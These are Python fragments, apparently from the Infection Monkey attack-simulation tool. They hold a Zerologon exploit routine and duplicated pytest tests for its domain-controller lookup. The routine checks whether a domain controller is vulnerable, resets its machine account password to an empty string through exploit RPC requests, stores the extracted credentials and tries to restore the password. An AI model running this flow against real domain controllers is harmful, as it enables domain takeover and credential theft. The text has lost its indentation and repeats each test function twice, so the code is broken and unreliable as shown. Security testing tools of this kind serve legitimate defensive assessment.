def _exploit_host(self) -> bool:
self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)
can_exploit, rpc_con = is_exploitable(self)
if can_exploit:
logger.info(
"Target vulnerable, changing account password to empty string."
)
# Start exploiting attempts.
logger.debug("Attempting exploit.")
_exploited = self._send_exploit_rpc_login_requests(rpc_con)
rpc_con.disconnect()
else:
logger.info(
"Exploit not attempted. Target is most likely patched, or an error was "
"encountered.")
return False
# Restore DC's original password.
if _exploited:
if self.restore_password():
self.exploit_info["password_restored"] = True
self.store_extracted_creds_for_exploitation()
logger.info(
"System exploited and password restored successfully.")
else:
self.exploit_info["password_restored"] = False
logger.info("System exploited but couldn't restore password!")
else:
logger.info("System was not exploited.")
return _exploited
def test_get_dc_details_no_netbios_names(host, monkeypatch):
NETBIOS_NAMES = []
stub_queryIPForName = _get_stub_queryIPForName(NETBIOS_NAMES)
monkeypatch.setattr(NetBIOS, "queryIPForName", stub_queryIPForName)
with pytest.raises(DomainControllerNameFetchError):
dc_ip, dc_name, dc_handle = get_dc_details(host)
def test_get_dc_details_no_netbios_names(host, monkeypatch):
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details
NETBIOS_NAMES = []
stub_queryIPForName = _get_stub_queryIPForName(NETBIOS_NAMES)
monkeypatch.setattr(NetBIOS, "queryIPForName", stub_queryIPForName)
with pytest.raises(DomainControllerNameFetchError):
dc_ip, dc_name, dc_handle = get_dc_details(host)
def test_get_dc_details_multiple_netbios_names(host, monkeypatch):
NETBIOS_NAMES = ["Name1", "Name2", "Name3"]
stub_queryIPForName = _get_stub_queryIPForName(NETBIOS_NAMES)
monkeypatch.setattr(NetBIOS, "queryIPForName", stub_queryIPForName)
dc_ip, dc_name, dc_handle = get_dc_details(host)
assert dc_ip == IP
assert dc_name == NETBIOS_NAMES[0]
assert dc_handle == f"\\\\{NETBIOS_NAMES[0]}"
def test_get_dc_details_multiple_netbios_names(host, monkeypatch):
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details
NETBIOS_NAMES = ["Name1", "Name2", "Name3"]
stub_queryIPForName = _get_stub_queryIPForName(NETBIOS_NAMES)
monkeypatch.setattr(NetBIOS, "queryIPForName", stub_queryIPForName)
dc_ip, dc_name, dc_handle = get_dc_details(host)
assert dc_ip == IP
assert dc_name == NETBIOS_NAMES[0]
assert dc_handle == f"\\\\{NETBIOS_NAMES[0]}"